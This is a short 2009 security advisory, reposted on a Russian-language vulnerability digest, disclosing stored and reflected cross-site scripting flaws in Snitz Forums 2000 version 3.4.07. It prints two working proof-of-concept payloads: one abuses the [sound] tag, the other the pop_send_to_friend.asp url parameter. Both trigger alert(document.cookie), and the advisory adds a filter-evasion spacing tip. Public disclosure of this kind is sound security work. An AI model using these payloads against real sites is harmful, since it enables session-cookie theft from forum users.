Дополнительная информация Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl) From:Andrea Fabrizi <andrea.fabrizi_(at)_gmail.com> Date:15 октября 2009 г.Subject:Snitz Forums 2000 Multiple Cross-Site Scripting Vulnerabilities************************************************************** Application: Snitz Forums 2000 Version affected: 3.4.07 Website: http://forum.snitz.com/ Discovered By: Andrea Fabrizi Email: andrea.fabrizi@gmail.com Web: http://www.andreafabrizi.it Vuln: Multiple Cross-Site Scripting ************************************************************** ###### PERMANENT XSS If [sound] tag is allowed: [sound]http://url_to_valid_mp3_or_m3u_file.m3u" onLoad="alert(document.cookie)[/sound] ###### ###### LINK XSS http://localhost/forum/pop_send_to_friend.asp?url=</textarea><img src="http://www.google.it/intl/it_it/images/logo.gif" onLoad ="alert(document.cookie)"> Note the space: onLoad<space>="alert(document.cookie)" ###### -- Andrea Fabrizi http://www.andreafabrizi.it
Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)
